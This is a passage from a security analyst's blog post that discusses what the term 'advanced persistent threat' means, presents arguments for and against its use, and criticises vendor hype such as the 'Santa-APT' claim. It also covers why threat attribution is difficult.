According to Bejtlich, "If the USAF wanted to talk about a certain intrusion set with uncleared personnel, they could not use the classified threat actor name.  Therefore, the USAF developed the term APT as an unclassified moniker" (page 21).  Based on later reports about cyber espionage, I believe APT was originally used for state-sponsored threat actors like those in China [3].

A case for using "APT"

Bejtlich's article has specific guidelines on what constitutes an APT.  He also discussed it on his blog [4].  Some key points follow:

  • Advanced means the adversary can operate in the full spectrum of computer intrusion.
  • Persistent means the adversary is formally tasked to accomplish a mission.
  • Threat refers to a group that is organized, funded, and motivated.

If you follow these guidelines, using APT to describe a particular adversary is well-justified.

Mandiant's report about a Chinese state-sponsored group called APT1 is a good example [3].  In my opinion, FireEye and Mandiant have done a decent job of using APT in their reporting.

A case against "APT"

The terms "advanced" and "persistent" and even "threat" are subjective.  This is especially true for leadership waiting on the results of an investigation.

Usually, when I've talked with people about APT, they're often referring to a targeted attack.  Some people I know have also used APT to describe the actor behind a successful attack, even when it wasn't something I considered targeted.  We always think our organization is special, so if we're compromised, it must be an APT!  But if your IT infrastructure has any sort of vulnerability (and it likely does, since people are trained to balance risk and profit), you're as likely to be compromised by a common cyber criminal as you are by an APT.

Bejtlich states that after Google's "Operation Aurora" breach in 2010, widespread attention was brought to APT.  At that point, many vendors saw APT as a marketing angle to rejuvenate a slump in security spending [2].  I think most media outlets have tried to ride that trend.


Shown above:  An example of media reporting on APT.

A good example of bad reporting is the "Santa-APT" blog post from CloudSek in December 2015.  The CloudSek site (and the blog post) are no longer online; however, other sources have reported the info [5] and a cached version is available here.


Shown above:  Screenshots of the alleged "Santa APT" app.

The blog post reported a malicious Santa-themed Android app hosted on the Google Play Store.  CloudSek stated the app was the work of an APT group that it called Santa-APT.  The post was very short on details, and many I knew in the community were skeptical of CloudSek's claim.  The company's tweet even had a comment disputing the article's claims [6].  I certainly didn't see anything that indicated the malware was created by an advanced adversary with specific goals against distinct targets.

Final words

As far as I'm concerned, APT is still a vague term that's now a buzzword.  People generally use it according to their own biases.  Remember that APT is supposed to describe an adversary and not the attack.

I recently attended the FOR578 Cyber Threat Intelligence class at SANSFIRE 2016.  For me, one of the big points from FOR578 is that attribution is tricky.  You can review all the data about an attack on your network and still not be certain who is behind it.  People's biases get in the way, especially when the biggest question is "who did this?"

But identifying the people behind an attack is often futile.  Find patterns in the available data and try to categorize them, yes.  You might recognize a repeat attacker, and you'll be better prepared to respond.  However, you may never truly know who is behind any given set of attacks.  I feel we should be focusing on what vulnerabilities allowed the attack to happen in the first place.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

References:

[1] https://isc.sans.edu/forums/diary/SOC+Analyst+Pyramid/19677/
[2] http://viewer.media.bitpipe.com/1152629439_931/1279750495_63/0710_ISM_updated_072010.pdf
[3] http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf
[4] http://taosecurity.blogspot.com/2010/01/what-is-apt-and-what-does-it-want.html
[5] http://www.theregister.co.uk/2015/12/16/ho_ho_hosed_asian_biz_malware_pwns_airgaps_thousands_of_androids/
[6] https://twitter.com/fb1h2s/status/677083166461452288

2 Comments